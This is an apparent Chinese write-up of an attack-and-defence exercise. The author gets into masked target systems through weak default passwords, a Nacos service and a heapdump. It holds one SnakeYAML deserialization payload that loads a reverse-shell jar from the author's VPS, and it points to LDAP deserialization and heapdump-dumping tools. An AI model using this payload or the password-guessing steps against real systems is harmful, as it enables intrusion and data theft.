前言
打点
某个系统,太典了,直接弱口令进入
作为一个安服仔,测xss成被动了,想想难以深入利用,本身就是管理员账号,不过可以钓鱼拿个人主机权限,也是有分的,不过比较麻烦,时间不是那么充足,这里就不考虑了
这个系统也有计划任务功能,按照网上的一个方法,将反弹shell的jar包传到我的vps上,启了个web服务
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://vps地址/yaml-payload.jar"] ]]]')
这里执行之后无任何反应,不过只访问vps地址的时候倒是收到请求了,感觉有戏,又尝试了下jndi注入,也是没有成功
看了看其他地方,这里看到了jdk的版本,好像有点高,所以无法进行一般的jndi注入
这里经过高手指挥,下载了个高版本下的利用工具
https://github.com/C3P0ooo/LDAPDeserialize-tool
收到请求
数据库
首先网站A为https://tjaa.xxx.com/#/login,这里弱口令admin、123456直接跑出来了,不过功能点很少
然后网站B为https://admin.xxx.com/#/login,跟A为同类型网站
这里测试admin账号是存在的,但是密码爆不出来
回到网站A,这里猜测默认密码应该就为123456
于是拿这个密码去admin网站跑用户名,最后跑出来了很多,一一验证发现ceshi这个账号是有全部权限的,数据量还挺大的
发现此站点下有nacos服务,直接就是弱口令进入
但是又发现了heapdump文件
https://github.com/whwlsfb/JDumpSpider
第二天直接阳了,实在干不动了,还有很多口子没有深入测试,提交了几个弱口令和未授权访问就草草结束了
总结
原文始发于微信公众号(起凡安全):一次攻防演练记录
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论